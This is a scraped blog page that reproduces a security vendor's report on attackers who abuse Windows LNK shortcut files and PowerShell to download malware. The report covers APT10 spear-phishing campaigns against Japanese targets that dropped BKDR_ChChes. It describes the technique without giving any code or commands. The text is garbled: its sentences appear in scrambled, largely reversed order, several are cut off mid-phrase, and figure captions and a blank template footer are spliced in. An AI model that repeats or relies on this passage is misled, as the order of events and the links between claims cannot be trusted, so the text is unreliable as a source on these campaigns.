![]() They send a phishing email with lures that push the victim to “double click for content”, typically a DOCX or RTF file embedded with a malicious LNK. These attackers seem to be using several layers of command line, built-in, Windows tools. We identified one campaign, likely still ongoing, that has a new and complicated LNK strategy. The group has continued to evolve their cyberespionage activities, and in April 2017 they used a similar strategy to also download BKDR_ChChes, which is a popular malware used in targeted attacks. jpg file hiding the malicious PowerShell script. In this version, the LNK file executes CMD.exe, which in turn downloads a fake. In January 2017 we spotted the group APT10 (also called MenuPass, POTASSIUM, Stone Panda, Red Apollo, and CVNX) using a similar attack for a wide-spread spear phishing campaign. Attack used to compromise Japanese targets in October 2016 jpg extension to camouflage the malicious PowerShell file.įigure 2. In October 2016 we saw attackers using the combination of LNK, PowerShell, and the BKDR_ChChes malware in targeted attacks against Japanese government agencies and academics. Detected LNK_DLOADR over a 4 month period The steep rise shows how popular this method is becoming:įigure 1. To illustrate how the trend of using LNK files is rising, note how one single LNK malware (identified by Trend Micro as LNK_DLOADR.*) has had a significant jump in detections since January 2017. ![]() Now, we’re seeing an increase in attacks that leverage malicious LNK files that use legitimate apps-like PowerShell-to download malware or other malicious files. zip to disguise a LNK file attachment that led to the Locky ransomware. And in early 2017, we noted how Trojan downloaders used a. LNK was actually already used as an attack vector as early as 2013. LNK files are usually seen by users as shortcuts, and used in places like the Desktop and Start Menu. However, cybercriminals are staying ahead of the curve by using alternative means of executing PowerShell script-Windows LNK (LNK) extensions. Because this seemed to be an upward trend, security administrators became more familiar with how to prevent PowerShell scripts from doing any damage. There were a few notable instances where cybercriminals abused PowerShell: in March 2016 with the PowerWare ransomware, and in a new Fareit malware variant in April 2016. All told, it makes an attractive tool for threat actors. It runs discreetly in the background, and can be used to obtain system information without an executable file. ![]() PowerShell is a versatile command-line and shell scripting language from Microsoft that can integrate and interact with a wide array of technologies. Update as of May 30, 2017, 5:00 AM CDT to update the date referencing Trojan downloaders that used. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |